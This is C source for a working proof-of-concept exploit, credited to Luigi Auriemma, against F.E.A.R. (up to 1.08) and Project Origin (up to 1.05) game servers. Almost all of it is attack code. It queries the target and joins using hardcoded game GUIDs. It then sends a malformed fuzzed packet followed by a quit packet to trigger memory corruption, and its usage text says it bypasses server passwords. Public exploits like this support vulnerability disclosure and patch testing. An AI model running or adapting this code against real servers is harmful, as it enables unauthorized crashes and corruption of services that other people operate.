/*
    Copyright 2010 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl-2.0.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "rwbits.h"
//#include "show_dump.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
    #define sleepms Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stricmp strcasecmp
    #define stristr strcasestr
    #define ONESEC  1
    #define sleepms(X) usleep(X * 1000)
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0xffff  // 8192
#define PROTO2_SIGN 0x01337f10
#define TIMEOUT     2
#define GUIDSZ      16
#define WAITSEC     2



void lithtech_crc(u8 *data, int len);
int write_xnum(u32 n, u8 *buff, int b);
int write_bituni(u8 *in, u8 *out, int bits);
int write_bitmem(u8 *in, int len, u8 *out, int bits);
int udp_sock(int forced_port);
u8 *gs_info(struct sockaddr_in *peer, u8 *buff, int buffsz);
int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...);
int build_guid(u8 *guid);
u8 *show_guid(u8 *guid);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
void show_games(void);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



typedef struct {
    u8      *gamename;
    u8      *gsname;
    int     proto;
    u8      guid[GUIDSZ + 1];   // + 1 for the last byte sniffed that is used in << 3
} games_t;



    // guids for all the retail versions
    // do NOT use const because guid gets modified
games_t   games[] = {
    { "Alien vs Predator 2",
        "avp2",
        1,
        "\xC1\x2B\xFB\x1D\x40\xEB\xD2\x11\xB7\xD2\x00\x60\x97\x17\x66\xC1" },

    { "Alien vs Predator 2 (demo)",
        "avp2d",
        1,
        "\xC2\x2B\xFB\x1D\x40\xEB\xD2\x11\xB7\xD2\x00\x60\x97\x17\x66\xC1" },

    { "Blood 2",
        "blood2",
        1,
        "\x29\xE6\x13\x0C\x9C\x41\xD2\x11\x86\x0A\x00\x60\x97\x19\xA8\x42" },

    { "Contract Jack",
        "contractjack",
        2,
        "\x52\xcf\xd5\x08\x84\xb6\x95\x36\xba\x24\xb5\x5a\x9b\x0c\x80\x2a" },

    { "Contract Jack (unknown version)",
        "contractjack",
        2,
        "\x90\x05\x56\xDF\x18\xD9\x51\x4A\x9C\xB1\x38\xEB\xBE\x38\x79\xAD" },

    { "F.E.A.R. / F.E.A.R. 2 Project Origin",
        "fear",
        2,
        "\x82\x2c\xb0\xfa\xc6\xc8\x8e\x52\xe2\x8c\xc5\x59\xf7\xc5\xc9\x6b\x05" },

    { "F.E.A.R. 2 Project Origin",   // yes, just a copy of the above one
        "poriginpc",
        2,
        "\x82\x2c\xb0\xfa\xc6\xc8\x8e\x52\xe2\x8c\xc5\x59\xf7\xc5\xc9\x6b\x05" },

    { "F.E.A.R. (demo)",
        "fear",
        2,
        "\x72\x1B\xC7\xBC\x6C\x3B\x62\x4F\xC2\x5D\x6A\xA4\x1E\x74\x4D\x37" },

    { "Global Operations",
        "globalops",
        1,
        "\x8B\x87\xBD\xF6\x76\x31\x96\x41\xB0\x8F\x40\xF3\xDC\x5A\xB3\x53" },

    { "Kiss Psycho Circus",
        "kiss",
        1,
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" },

    { "Legends of Might and Magic",
        "legendsmm",
        1,
        "\x00\xe2\x8e\x97\x86\x0d\xd5\x11\xb8\x4c\x00\x01\x03\xc2\xab\xbe" },

    { "No one lives forever",
        "nolf",
        1,
        "\xA1\x62\xFA\x8A\xAE\x01\xD5\x11\xB9\x5C\x00\x60\x97\x09\x83\x0E" },

    { "No one lives forever (demo)",
        "nolf",
        1,
        "\xA2\x62\xFA\x8A\xAE\x01\xD5\x11\xB9\x5C\x00\x60\x97\x09\x83\x0E" },

    { "No one lives forever 2 (?)",
        "nolf2",
        2,
        "\xB4\x86\x8E\x8F\x29\x1B\x56\x99\x47\x2D\xCA\x13\x88\x90\x94\x85" },
        // "\xD3\x96\xF6\xBE\xDC\xE5\xB5\x4D\xB3\xD6\x70\xAF\xBD\x0D\x2A\xDD" },
        // "\xe8\xf4\xc4\x64\x04\x22\x03\x42\x54\x16\x46\x87\xd6\x16\x46\x37" },

    { "No one lives forever 2 (demo)",
        "nolf2",
        2,
        "\xe9\xf4\xc4\x64\x04\x22\x03\x42\x54\x16\x46\x87\xd6\x16\x46\x37" },
        // "\x43\x41\x1C\xB2\x9C\xCF\x69\x46\xA5\xE0\xE7\x51\xB0\xCD\xE3\xB1" },
        // "\x27\x46\xDE\x37\xB3\x97\xF9\x86\x2F\xC9\x13\xDC\xB6\x3D\x9F\xAA" },
        // "\x18\x0a\xe2\x90\xe5\x7c\x4e\x33\x2a\x05\x3f\x8f\x82\x6d\x1e\x8f\xfd" },

    { "Purge Jihad",
        "",
        1,
        "\xBF\xED\xD7\x9C\x62\x9B\x79\x4A\x8D\x32\x1B\x74\xF6\x07\x65\x1D" },

    { "Sanity",
        "sanity",
        1,
        "\x80\x3F\x53\x3C\xE9\x46\xD4\x11\xA2\xBA\x00\x01\x02\x29\x38\x8A" },

    { "Shogo",
        "shogo",
        1,
        "\x80\xDE\xEE\x87\xD4\x0E\xD2\x11\xBA\x96\x00\x60\x08\x90\x47\x76" },

    { "Shogo (demo)",
        "shogo",
        1,
        "\x60\xde\xaa\x67\xb3\x0a\xd4\x22\xcd\x69\x00\x40\x05\x92\x34\x31" },

    { "Terrawars",
        "",
        2,
        "\x9a\xb6\xb4\xf7\xe5\x2e\xaf\x6d\x9a\xb5\x86\x7b\xed\x6d\x50\xe9" },

    { "Tron 2.0 (demo)",
        "tron20",
        2,
        "\xba\x05\xaa\xb5\x75\xef\x2b\x78\xaa\x25\x9c\x28\x45\x98\xd8\xeb" },

    { "Tron 2.0 (unknown version)",
        "tron20",
        2,
        "\x66\x2B\x27\xFC\x72\x83\xEF\x49\xA6\x42\x28\xCA\xD2\xB9\xEA\xC9" },

    { "test",
        "", // do not touch
        1,  // do not touch
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" },

    { NULL,
        NULL,
        0,
        "" }
};



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u32     rnd         = 0;
    int     sd,
            i,
            b,
            t,
            len,
            proto,
            guid_fix    = 0,    // used because the engine uses bitstreams and so the 16 bytes in the packet are not the guid (<< 3)
            game_num    = 0;
    u16     port;
    u8      *buff,
            *gsname     = NULL,
            *myguid     = NULL,
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "F.E.A.R <= 1.08 and Project Origin <= 1.05 memory corruption "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s [options] <host> <port>\n"
            "\n"
            "Options:\n"
            "-g G  specify a game or its guid in case it's not recognized/supported\n"
            "      for having the list of supported games use -g ?\n"
            "      the G argument can be the name or part of the name of the game, or its\n"
            "      number or a custom guid in hexadecimal form (like \"00 11 22 ...\") or\n"
            "      native one (like df560590-d918-4a51-9cb1-38ebbe3879ad)\n"
            "      this guid is in the join packet visible with a sniffer because it begins\n"
            "      with 00 03 00 for protocol 1 and 10 7f 33 01 for protocol 2 (contact me)\n"
            "\n"
            " the most used port is usually 27888\n"
            " this tool automatically works also any password protected server without\n"
            " knowing the password!\n"
            "\n", argv[0]);
        exit(1);
    }

    argc -= 2;
    for(i = 1; i < argc; i++) {
        if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) {
            printf("\nError: wrong argument (%s)\n", argv[i]);
            exit(1);
        }
        switch(argv[i][1]) {
            case 'g': myguid  = strdup(argv[++i]);  break;
            default: {
                printf("\nError: wrong argument (%s)\n", argv[i]);
                exit(1);
            }
        }
    }
    if(i > argc) {
        printf("\nError: recheck your options, you have missed one or more parameters\n");
        exit(1);
    }

    host = argv[argc];
    port = atoi(argv[argc + 1]);

    if(myguid) {
        if(!myguid[0] || !stricmp(myguid, "list") || !stricmp(myguid, "?")) {
            show_games();
            exit(1);
        }

        if(strlen(myguid) < (GUIDSZ * 2)) { // gamename
            for(i = 0; myguid[i]; i++) {
                if(!((myguid[i] >= '0') && (myguid[i] <= '9'))) break;
            }
            if(!myguid[i]) {    // is a number
                game_num = atoi(myguid);
                for(i = 0; games[i].gamename; i++) {
                    if(game_num == i) break;
                }
            } else {
                game_num = -1;
                i = 0;
            }   // so if the previous fails then it will switch here
            if((game_num < 0) || !games[i].gamename) {
                for(i = 0; games[i].gamename; i++) {
                    if(!stricmp(myguid, games[i].gsname)) break;
                }
                if(!games[i].gamename) {
                    for(i = 0; games[i].gamename; i++) {
                        if(stristr(myguid, games[i].gamename)) break;
                    }
                }
            }
            if(!games[i].gamename) {
                printf("\nError: the game %s has not been found in the database\n", myguid);
                exit(1);
            }
            game_num = i;
        } else {                            // guid
            if(build_guid(myguid) < 0) {    // success: myguid is set, fail: < 0
                p = myguid;
                for(i = 0; p && (i < sizeof(games[game_num].guid)); i++, p += len) {
                    while(*p && ((*p <= ' ') || (*p == '\\') || (*p == 'x'))) p++;
                    if(sscanf(p, "%02x%n", &t, &len) != 1) break;
                    myguid[i] = t;
                }
                if(i < GUIDSZ) {
                    printf("\nError: the guid you specified is not %d bytes long\n", GUIDSZ);
                    exit(1);
                }
            }
            for(i = 0; games[i].gamename; i++); // "test"
            game_num = i - 1;
            memcpy(games[game_num].guid, myguid, GUIDSZ);
        }
    }

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    printf("- target   %s:%hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    gsname = gs_info(&peer, buff, BUFFSZ);
    if(!gsname || !gsname[0]) {
        //if(!games[game_num].gsname || !games[game_num].gsname[0]) { // "test"
        if(myguid) {
            // ok?
        } else {
            if(gsname && !gsname[0]) {
                gsname = "poriginpc"; // auto
            } else {
                printf("\n"
                    "Error: no gamename received from the query\n"
                    "       you must specify the game or its guid\n"
                    "       for example use the following command if the server is F.E.A.R.:\n"
                    "         %s -g fear %s %s\n"
                    "       or\n"
                    "         %s -g ? %s %s\n"
                    "       for the list of supported games\n"
                    "\n",
                    argv[0], argv[1], argv[2],
                    argv[0], argv[1], argv[2]);
                exit(1);
            }
        }
    }   // separated for compatibility above
    if(gsname) {
        for(i = 0; games[i].gamename; i++) {
            if(!stricmp(gsname, games[i].gsname)) break;
        }
        if(games[i].gamename) {
            game_num = i;
            printf("- set game %s\n", games[game_num].gamename);
        }
    }

    proto = games[game_num].proto;

    printf(
        "- game chosen:\n"
        "  name     %s\n"
        "  protocol %d\n"
        "  guid     %s\n",
        games[game_num].gamename,
        proto,
        show_guid(games[game_num].guid));

    printf("- start attack:\n");
    for(;;) {
        for(;;) {
            printf("\n  Player: ");

            if(proto == 1) {
                buff[0] = 0;
                buff[1] = 3;
                buff[2] = 0;
                memcpy(buff + 3, games[game_num].guid, GUIDSZ);
                len = 3 + GUIDSZ;
            } else if(proto == 2) {
                b = 0;
                b = write_bits(PROTO2_SIGN, 32, buff, b);
                b = write_bits(2, 3, buff, b);  // 0 to 5 (pairs from clients, others from server
                                                // 0 for a ping-like query
                                                // 2 for joining
                                                // 4 for ???
                b = write_bitmem(games[game_num].guid, GUIDSZ, buff, b);
                b = write_bits(0x7fffffff, 32, buff, b);    // flow control: alternative is 0x00100000
                len = ((b + 7) & (~7)) >> 3;
            }

            sd = udp_sock(-1);
            len = send_recv(sd, buff, len, buff, BUFFSZ, &peer, 0);

            if(len < 0) {
                if(proto == 2) {    // timeout
                    printf("\nError: timeout, no reply received\n");
                    exit(1);
                    //std_err();
                }
                proto++;
                printf(" try protocol %d\n", proto);
                continue;
            }

            if(!memcmp(buff, "\x00\x05", 2)) {
                proto = 1;
                printf("ok");
            } else if(!memcmp(buff, "\x00\x06", 2)) {
                proto = 1;
                break;  // server full
            } else {
                proto = 2;
                b = 0;
                t = read_bits(32, buff, b); b += 32;
                if(t != PROTO2_SIGN) goto quit_error;
                t = read_bits(3,  buff, b); b += 3;
                if(t != 3) goto quit_error;
                t = read_bits(1,  buff, b); b += 1;
                if(t) {
                    printf("ok");

                    /* in-game
                    if(1) {
                        if(1) read 8
                        else read 0x0d
                    }
                    if(1) read 32
                    if(1) read 32
                    if(1) {
                        read 0xd
                        read 1
                        index_number
                        ...
                        read 1
                    }
                    if(1) {
                        read 7
                        if(1) {
                            read 3
                            while(1) read 1
                        }
                    } */

                        b = 8;  // crc
                        b = write_bits(0, 1, buff, b);
                        b = write_bits(0, 1, buff, b);
                        b = write_bits(0, 1, buff, b);
                        b = write_bits(1, 1, buff, b);
                            b = write_bits(1, 0xd, buff, b);
                            b = write_bits(0, 1, buff, b);
                            b = write_xnum(406, buff, b);

                            // the following part doesn't match the protocol (visible in lithfp)
                            // this is only a result of the fuzzing I performed and left "as is"
                            // yes, it's lame but I'm not interested to spend time on this bug
                            b = write_bits(1, 1, buff, b);
                            b = write_bits(2, 7, buff, b);
                            b = write_bits(8000, 16, buff, b);  // size of the data that follows, any value works
                            if(!rnd) rnd = 0x35db92f3;
                            for(i = 0; i < 8000; i++) {
                                b = write_bits(rnd, 8, buff, b);
                                rnd = ((rnd * 0x343FD) + 0x269EC3) >> 1;
                            }
                            // end of lame part

                        b = write_bits(0, 1, buff, b);
                        len = ((b + 7) & (~7)) >> 3;
                        lithtech_crc(buff, len);
                        printf("\n- send malformed packet\n");
                        len = send_recv(sd, buff, len, buff, BUFFSZ, &peer, 1);
                        sleep(ONESEC);

                        // quit from the server, needed to exploit the bug immediately
                        b = 8;  // crc
                        b = write_bits(1, 1, buff, b);
                            b = write_bits(1, 1, buff, b);
                                b = write_bits(0, 8, buff, b);
                        b = write_bits(0, 1, buff, b);
                        b = write_bits(0, 1, buff, b);
                        b = write_bits(0, 1, buff, b);
                        b = write_bits(0, 1, buff, b);
                        len = ((b + 7) & (~7)) >> 3;
                        lithtech_crc(buff, len);
                        printf("\n- send quit packet for exploiting the bug now\n");
                        len = send_recv(sd, buff, len, NULL, 0, &peer, 0);
                        sleep(ONESEC);

                } else {
                    t = read_bits(1,  buff, b); b += 1;
                    if(t) break;    // server full
                    //t = read_bits(8,  buff, b); b += 8;   // not needed
                    if(guid_fix) {  // because the shifting eat a part of the last byte
                        if(games[game_num].guid[GUIDSZ-1] == 0xff) goto quit_error;
                        games[game_num].guid[GUIDSZ-1]++;
                    } else {
                        write_bitmem(games[game_num].guid, sizeof(games[game_num].guid), buff, 0);
                        b = 3;
                        for(i = 0; i < GUIDSZ; i++) {
                            t = read_bits(8, buff, b); b += 8;
                            games[game_num].guid[i] = t;
                        }
                        guid_fix = 1;
                    }
                    printf(" try guid %s", show_guid(games[game_num].guid));
                }

                close(sd);
            }
        }

        printf("\r- Server full");
        for(i = 0; i < WAITSEC; i++) {
            sleep(ONESEC);
        }
    }
    return(0);
quit_error:
    printf("\nError: unknown reply\n");
    //show_dump(buff, len, stdout);
    exit(1);
    return(1);
}



void lithtech_crc(u8 *data, int len) {
    static const u32    crctable[] = {
        0x00000000, 0x77073096, 0xee0e612c, 0x990951ba,
        0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
        0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
        0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
        0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
        0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
        0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec,
        0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
        0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
        0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
        0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940,
        0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
        0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116,
        0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
        0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
        0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
        0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a,
        0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
        0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818,
        0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
        0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
        0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457,
        0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c,
        0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
        0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
        0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb,
        0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
        0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9,
        0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086,
        0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
        0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4,
        0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad,
        0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
        0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683,
        0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
        0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
        0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe,
        0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7,
        0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
        0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
        0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252,
        0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
        0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60,
        0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79,
        0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
        0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f,
        0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04,
        0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
        0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a,
        0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
        0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
        0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21,
        0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e,
        0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
        0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
        0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45,
        0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
        0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db,
        0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0,
        0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
        0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6,
        0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf,
        0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
        0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d };
    u32     crc;
    int     i;
    u8      crc8;

    crc = -1;
    for(i = 1; i < len; i++) {  // i = 1, not = 0 because the first byte is the crc
        crc = crctable[(data[i] ^ crc) & 0xff] ^ (crc >> 8);
    }
    crc = ~crc;

    for(crc8 = 0; crc; crc >>= 8) {
        crc8 ^= crc;
    }
    data[0] = crc8;
}



// a particular type of optimization for storing numbers
int write_xnum(u32 n, u8 *buff, int b) {
    b = write_bits(n & 0x7f, 7, buff, b);
    n >>= 7;
    if(n) {
        b = write_bits(1, 1, buff, b);
        b = write_bits(n & 7, 3, buff, b);
        for(n >>= 3; n; n >>= 1) {
            b = write_bits(1, 1, buff, b);
            b = write_bits(n & 1, 1, buff, b);
        }
    }
    b = write_bits(0, 1, buff, b);
    return(b);
}



int write_bituni(u8 *in, u8 *out, int bits) {
    int     i,
            len;

    len = strlen(in) + 1;   // final null
    for(i = 0; i < len; i++) {
        bits = write_bits(in[i], 16, out, bits);
    }
    return(bits);
}



int write_bitmem(u8 *in, int len, u8 *out, int bits) {
    int     i;

    if(len < 0) len = strlen(in);
    for(i = 0; i < len; i++) {
        bits = write_bits(in[i], 8, out, bits);
    }
    return(bits);
}



int udp_sock(int forced_port) {
    static struct   sockaddr_in *peerl = NULL;
    static struct   linger  ling = {1,1};
    static int      on = 1;
    int     sd;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
    setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));
    //setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on));

    if(!forced_port) return(sd); // no need to bind

    // must change port everytime
    if(!peerl) {
        peerl = malloc(sizeof(struct sockaddr_in));
        peerl->sin_addr.s_addr = INADDR_ANY;
        peerl->sin_port        = htons(~time(NULL));
        peerl->sin_family      = AF_INET;
    }
    if(forced_port <= 0) {
        peerl->sin_port++;  // for the next
    } else {
        peerl->sin_port = htons(forced_port);
    }
    while(bind(sd, (struct sockaddr *)peerl, sizeof(struct sockaddr_in)) < 0) {
        peerl->sin_port++;  // yeah on little endian it's not sequential and this is what I want
    }
    return(sd);
}



#define GS1_QUERY   "\\status\\"    // \status\ returns 3 packets, I'm too lazy to handle all of them
#define GS2_QUERY   "\xfe\xfd\x00" "\x00\x00\x00\x00"                    "\xff\x00\x00" "\x00"
#define GS3_QUERY   "\xfe\xfd\x09" "\x00\x00\x00\x00"
#define GS3_QUERYX  "\xfe\xfd\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00"

u8 *gs_info(struct sockaddr_in *peer, u8 *buff, int buffsz) {
    u32     chall;
    int     sd,
            len,
            oldtype     = 0,
            retver      = 0;
    u8      gs3[sizeof(GS3_QUERYX) - 1],
            *gamever    = NULL,
            *hostport   = NULL,
            *gsname     = NULL;

    sd = udp_sock(0);

    printf("\n- send info queries\n");
          send_recv(sd, GS1_QUERY, sizeof(GS1_QUERY) - 1, NULL, 0, peer, 0);
          send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, NULL, 0, peer, 0);
          //send_recv(sd, GS3_QUERY, sizeof(GS3_QUERY) - 1, NULL, 0, peer, 0);
    //for(;;) {   // loop needed for some old games that use gamespy1
        len = send_recv(sd, NULL, 0, buff, buffsz, peer, 0);
        if(len < 0) goto quit;
        if(buff[0] == '\\') {
            oldtype = 1;
        } else if(buff[0] == 9) {
            memcpy(gs3, GS3_QUERYX, sizeof(GS3_QUERYX) - 1);
            chall = atoi(buff + 5);
            gs3[7]  = chall >> 24;
            gs3[8]  = chall >> 16;
            gs3[9]  = chall >>  8;
            gs3[10] = chall;
            len = send_recv(sd, gs3, sizeof(GS3_QUERYX) - 1, buff, buffsz, peer, 0);
            if(len < 0) goto quit;
        }

        printf("\n- handle reply:\n");
        gs_handle_info(buff, len,
            oldtype ? 1 : 0, oldtype ? '\\' : '\0', oldtype ? 0 : 5, 0,
            "gamever",      &gamever,
            "hostport",     &hostport,
            "gameport",     &hostport,
            "gsgamename",   &gsname,
            "gamename",     &gsname,
            NULL,       NULL);

        if(gamever) {
            retver = atoi(gamever);
        }
        if(hostport && atoi(hostport)) {
            peer->sin_port = htons(atoi(hostport));
            printf("\n- set hostport %hu\n", ntohs(peer->sin_port));
        }
    //}

quit:
    close(sd);
    return(gsname);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %30s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



int build_guid(u8 *guid) {
    int     g1,g2,g3,g4,g5,g6,g7,g8,g9,g10,g11;

    // sscanf doesn't really support hh so I need the manual boring way, blah
    if(sscanf(guid, "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x",
        &g1,&g2,&g3,&g4,&g5,&g6,&g7,&g8,&g9,&g10,&g11) != 11) return(-1);

    *(u32 *)(guid)      = g1,
    *(u16 *)(guid + 4)  = g2,
    *(u16 *)(guid + 6)  = g3,
    guid[8]     = g4;
    guid[9]     = g5;
    guid[10]    = g6;
    guid[11]    = g7;
    guid[12]    = g8;
    guid[13]    = g9;
    guid[14]    = g10;
    guid[15]    = g11;
    return(0);
}



u8 *show_guid(u8 *guid) {
    static u8   ret[37];

    sprintf(ret, "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x",
        *(u32 *)(guid),
        *(u16 *)(guid + 4),
        *(u16 *)(guid + 6),
        guid[8], guid[9],
        guid[10], guid[11], guid[12], guid[13], guid[14], guid[15]);
    return(ret);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry = 2,
            len;

    if(in) {
        while(retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!out) return(0);
            if(!timeout(sd, 1)) break;
        }
    } else {
        if(timeout(sd, 3) < 0) retry = -1;
    }

    if(retry < 0) {
        if(!err) return(-1);
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



void show_games(void) {
    int     i;

    printf(
        " num p gamename       description\n"
        "---------------------------------\n");
    for(i = 0; games[i].gamename; i++) {
        printf(" %3d %d %-14s %s\n", i, games[i].proto, games[i].gsname, games[i].gamename);
    }
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

